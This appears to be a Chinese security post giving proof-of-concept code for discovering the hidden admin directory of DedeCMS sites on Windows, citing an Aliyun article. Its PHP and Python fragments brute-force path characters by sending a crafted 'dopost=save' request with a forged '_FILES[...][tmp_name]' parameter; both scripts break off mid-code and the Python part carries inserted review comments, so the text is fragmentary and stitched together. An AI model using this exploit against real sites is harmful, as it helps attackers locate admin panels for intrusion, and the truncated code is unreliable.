解决DEDECMS历史难题–找后台目录

仅适用于部署在 Windows 系统上的 DedeCMS 站点。

附原文地址:https://xz.aliyun.com/t/2064

附原理文档

poc:

 true,
        CURLOPT_HEADER => true,
        CURLOPT_POST => true,
        CURLOPT_SSL_VERIFYHOST => false,
        CURLOPT_SSL_VERIFYHOST => false,
        CURLOPT_COOKIE => $cookie,
        CURLOPT_POSTFIELDS => $data,
    );
    $ch = curl_init($url);
    curl_setopt_array($ch, $options);
    $result = curl_exec($ch);
    curl_close($ch);
    return $result;
}
$testlen=25;
$str=range('a','z');
$number=range(0,9,1);
$dic = array_merge($str, $number);
$n=true;
$nn=true;
$path='';
while($n){
    foreach($dic as $v){
        foreach($dic as $vv){
            #echo $v.$vv .'----';
            $post_data="dopost=save&_FILES[b4dboy][tmp_name]=./$v$vv
#!/usr/bin/env python
#coding:utf-8
import requests
import string


# Candidate alphabet: ASCII letters (lower case, then upper case), the ten
# digits, and the three symbols "_", "#" and "!".
# NOTE(review): the function that consumes this value is cut off on this page;
# presumably these are the characters tried one at a time -- confirm against
# the complete script.
login_str = "".join((string.ascii_letters, string.digits, "_#!"))

# Fixed request headers that imitate a desktop Firefox 56 browser.
# The User-Agent is a generic, dated string, so on its own it is a weak log
# indicator; the unusual part of the traffic is the "_FILES[...]" parameter
# name in the POST body that appears further down the page.
headers = {
    "User-Agent": (
        "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) "
        "Gecko/20100101 Firefox/56.0"
    ),
    "Accept": (
        "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
    ),
    "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
}

def chek_poc(v,letter):
        if v<=5.6:
                poc= {
                        "dopost":"save",
                        "_FILES[b4dboy][tmp_name]":"./%s

 

 

 
